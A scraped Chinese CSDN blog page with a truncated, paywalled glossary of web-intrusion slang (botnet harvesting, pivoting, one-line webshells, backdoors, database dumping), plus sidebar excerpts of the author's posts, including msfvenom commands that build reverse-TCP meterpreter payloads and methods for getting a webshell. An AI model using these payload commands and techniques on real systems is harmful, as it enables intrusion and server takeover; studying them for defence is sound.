基础

最新推荐文章于 2022-03-27 21:16:36 发布
最新推荐文章于 2022-03-27 21:16:36 发布
阅读量496 收藏
点赞数
分类专栏: web安全 小白 渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32108547/article/details/109192289
版权

基础

一、常用术语

  • 脚本(asp,php,jsp)

  • html(css,js,html)

  • HTTP协议

  • CMS(B/S)

  • MD5

    信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位的散列值(hash value),用于确保信息传输完整一致。

  • 抓鸡

    利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。

  • 跳板

    使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。

  • 一句话

    通过向服务器提交一句简短的代码,配合本地客户端实现webshell功能的木马

  • 小马

  • webshell

    通过web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。

  • 提权

    操作系统低权限的账户将自己提升为管理员权限使用的方法

  • 后门

    黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个入口。

  • 源码打包

  • 脱裤

  • 嗅探

  • 旁站入侵

    即同服务器下的网站入侵ÿ

最低0.47元/天 解锁文章
L_lemo004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0 基础 Java 自学之路(2021年最新版)
程序员囧辉
04-08 40万+
屌丝逆袭之路
Python 基础(一):入门必备知识
热门推荐
Python小二
10-30 110万+
Python 入门必备知识,你都掌握了吗?
Java基础知识总结(超详细整理)
龙源IT 的博客
07-17 27万+
Java语言的特点,1.面向对象(OOP)就是Java语言的基础,也是Java语言的重要特性。面向对象的概念:生活中的一切事物都可以被称之为对象,生活中随处可见的事物就是一个对象,我们可以将这些事物的状态特征(属性)以及行为特征(方法)提取并出来,并以固定的形式表示。 2.简单好用,Java语言是由C和C++演变而来的,它省略了C语言中所有的难以理解、容易混淆的特性(比如指针),变得更加严谨、简洁、易使用。 3.健壮性、Java的安全检查机制,将许多程序中的错误扼杀在摇蓝之中。 另外,在
Java基础知识总结(2021版)
学Java,找哪吒
01-09 25万+
前言 大家好,我是素小暖,2012年毕业,2016年通过培训转行java开发,今天2021年1月9日,转行之路跌跌绊绊,蓦然回首,已经满满的4年工作经验了?但感觉知识还是相当的匮乏,没自信,也许是努力程度还不够吧。很感谢CSDN,因为是它给了我学习的动力,之前写了一篇记录CSDN博客访问量的文章,也许大家感觉很幼稚,但真的很有用,很有效果,仿佛磕了药一样,努力学习,进步。 2020年,是我较为成功的一年,工作上,跳了槽,涨了工资;学习上,啃了几本名著(Effective Java、重构 改善既.
基础篇:数据库 SQL 入门教程
LuciferLiu_DBA
09-12 33万+
超全SQL教程,收藏就完事了!
基础入门Matlab(一篇两个小时就能学完的入门博客)
灯火阑珊_
07-22 40万+
目录零基础入门matlab前言1.界面认识2.变量命名3.数据类型4.元胞数组和结构体5.矩阵操作6.程序结构7.基本绘图操作7.1.二维平面绘图7.2.三维立体绘图8.图形的保存与导出9.补充 零基础入门matlab 前言 这篇文章很适合MATLAB的入门学习,这也是我在入门时学习的笔记。 虽然说是”零基础“入门matlab,但是如果有其它编程语言基础的话,学起来自然会更轻松。 特别鸣谢:B站UP主——爱研究的小阿楠 1.界面认识 2.变量命名 注:Matlab中的注释 %% 独占一行的注释(有上下横线
计算机网络基础知识大全
学Java,找哪吒
07-26 10万+
️️️一、计算机网络的概念 计算机网络:是一个将分散的、具有独立功能的计算机系统,通过通信设备与线路连接起来,由功能完善的软件实现资源共享和信息传递的系统。 二、计算机网络的功能 1、数据通信 2、资源共享 3、分布式处理(多台计算机各自承担同一工作任务的不同部分) 4、提高可靠性 5、负载均衡 三、计算机网络的组成 1、组成部分 硬件、软件、协议 2、工作方式 边缘部分:用户直接使用(C/S方式、P2P方式) 核心部分:为边缘部分提供服务 3、功能组成 通信子网:实现数据通信
C语言初阶——手把手教零基础/新手入门(万字心得笔记)
Man9o
01-18 27万+
这是一篇为C语言学习新手倾注心血的学习&&心得笔记,零基础看完它也能看得懂代码!欢迎交流
Java基础语法
terence的博客
03-27 9万+
1. Java概述 1.1 Java语言发展史 语言:人与人交流沟通的表达方式 计算机语言:人与计算机之间进行信息交流沟通的一种特殊语言 Java语言是美国Sun公司(Stanford University Network)在1995年推出的计算机语言 Java之父:詹姆斯·高斯林(James Gosling) 2009年,Sun公司被甲骨文公司收购,所以我们现在访问oracle官网即可:https://www.oracle.com 当前,我们课程使用的JDK版本:11.0 1.2 Java语言跨平台原理
【超全汇总】学习数据结构与算法,计算机基础知识,看这篇就够了
帅地
01-18 10万+
由于文章有点多,并且发的文章也不是一个系列一个系列发的,不过我的文章大部分都是围绕着 数据结构 + 算法 + 计算机网络 + 操作系统 + Linux + 数据库 这几个方面发的,为了方便大家阅读,我整理了一波。不过公众号可以说是不支持修改文章,因为我决定每两三个月就整理一次,会非常详细着按照类别整理出来哦,并且也给出了目录哦。大家记得多看看哦,好多文章都是面试中常问滴 文章目录一、经验/经历/所...
计算机专业基础知识点pdf
06-26
计算机专业基础知识点是每个IT从业者或学习者都必须掌握的核心内容。这涵盖了多个领域,包括计算机体系结构、数据结构、算法、操作系统、网络和数据库等。408计算机基础标签表明了这些知识点主要针对计算机科学与...
数字电路基础.pdf
05-30
这份文档是供基础比较薄弱或零基础的人学习数电使用的,非常的有用,希望大家下载使用后能受益匪浅,更上一层楼。
java基础案例教程
01-08
java基础的案例分析和实例教学,适合新手及回顾查阅,对于夯实基础有好处
常见代码执行函数
L_lemo004的博客
07-12 6145
常见代码执行函数,如 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 文件操作函数 动态函数(a(a(a(b)) 1、eval() eval() 函数把字...
网站后台getshell的方法总结
L_lemo004的博客
07-12 5967
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张图片马...
MSF命令大全
L_lemo004的博客
10-20 5654
0x00 Payload生成 Windows/Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名 Web PHP: msfvenom -p php/meter
爆网站绝对路径方法
L_lemo004的博客
07-12 4995
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149’ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxx.com/researcharchive.php?id=-1 3、Google爆路径 说明: 结合关...
MSF常用命令
L_lemo004的博客
10-20 2586
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。 Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。 Msfconsole 开启msf Msfconsole -h 协助选择项 Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数 控制模块详细介绍: Exploits 渗入进攻控制模块 主要用于进攻方式 Auxiliary 輔助控制模块 主要用于信息内容搜集 Payloa

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值